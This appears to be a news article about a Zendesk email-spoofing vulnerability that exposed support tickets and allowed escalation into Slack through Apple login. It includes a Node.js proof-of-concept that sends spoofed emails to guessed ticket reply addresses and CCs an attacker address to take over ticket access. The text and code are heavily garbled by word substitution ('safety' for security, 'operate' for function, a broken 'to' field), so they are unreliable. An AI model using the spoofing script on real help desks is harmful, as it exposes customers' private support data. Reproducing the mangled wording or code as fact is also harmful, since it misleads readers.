A safety vulnerability in Zendesk, a broadly used customer support software, has been uncovered. This flaw allowed attackers to entry assist tickets from any firm utilizing Zendesk, posing vital dangers to delicate data.
Zendesk initially dismissed the vulnerability, which concerned e-mail spoofing, however later pressured the corporate to implement essential safety fixes. Right here’s an in depth have a look at the difficulty and its implications.
The Vulnerability: How E mail Spoofing Was Exploited
Zendesk is a well-liked platform for managing buyer assist tickets utilized by main firms worldwide. The flaw was found when it was discovered that Zendesk lacked sufficient safety towards e-mail spoofing.
This oversight allowed attackers to take advantage of the e-mail collaboration function and acquire unauthorized entry to assist tickets.
Analyse Any Suspicious Hyperlinks Utilizing ANY.RUN’s New Secure Shopping Device: Attempt for Free
The method was alarmingly easy. When an e-mail is distributed to an organization’s Zendesk assist portal, a brand new ticket is created with a novel reply-to deal with, akin to assist+id{id}@firm.com.
If an attacker knew this ticket ID, they might ship a spoofed e-mail from the unique requestor’s deal with and CC themselves.
Zendesk would then add the attacker’s e-mail to the ticket, granting them full entry to the ticket historical past. Right here’s a snippet of code demonstrating how an attacker might automate this course of:
const sendmail = require('sendmail')();
// Assuming the ticket you created in step #2 was assigned a ticket ID of #453
// verification e-mail landed someplace close to there
const vary = [448, 457];
for (let i = vary[0]; i < vary[1]; i++) {
// Ship spoofed emails from Apple to Zendesk
sendmail({
from: 'appleid@id.apple.com',
to: assist+id${i}@firm.com,
cc: 'attacker@instance.com',
topic: '',
html: 'remark physique',
}, operate (err, reply) {
console.log(err && err.stack);
console.dir(reply);
});
}Preliminary Dismissal and Subsequent Reactions
Upon discovering this vulnerability, the researcher reported it by way of Zendesk’s bug bounty program.
Nonetheless, the report was initially dismissed as “out of scope” as a result of it relied on e-mail spoofing.
This response was not from Zendesk immediately however by way of their third-party triage service on HackerOne. The researcher’s persistence paid off when particular person firms utilizing Zendesk had been alerted to the difficulty.
Many instantly disabled Zendesk’s e-mail collaboration function to guard their methods. The stress from these firms finally pressured Zendesk to acknowledge and deal with the vulnerability.
In line with the GitHub report, the implications of this vulnerability prolonged past Zendesk.
The researcher realized that the flaw may very well be used to infiltrate non-public Slack workspaces by exploiting Single Signal-On (SSO) methods that many firms use throughout each Slack and Zendesk.
By creating an Apple account with an organization’s assist e-mail and requesting a verification code, attackers might use the identical spoofing approach to entry Slack accounts through Apple OAuth login.
This escalation demonstrated how interconnected methods may very well be compromised by way of seemingly minor vulnerabilities.
Aftermath and Classes Discovered
After weeks of reporting the difficulty to affected firms, some took swift motion, whereas others blamed Zendesk.
Finally, Zendesk applied fixes by routinely enhancing their spam filters and suspending suspicious emails.
Regardless of these measures, the researcher obtained no bounty from Zendesk on account of alleged breaches of disclosure tips. Nonetheless, they earned over $50,000 in bounties from firms that appreciated the warning.
This incident highlights the essential significance of strong safety measures in third-party instruments like Zendesk. Corporations have to be vigilant about vulnerabilities of their built-in methods and guarantee complete validation processes are in place.
Methods to Select an final Managed SIEM answer for Your Safety Workforce -> Obtain Free Information(PDF)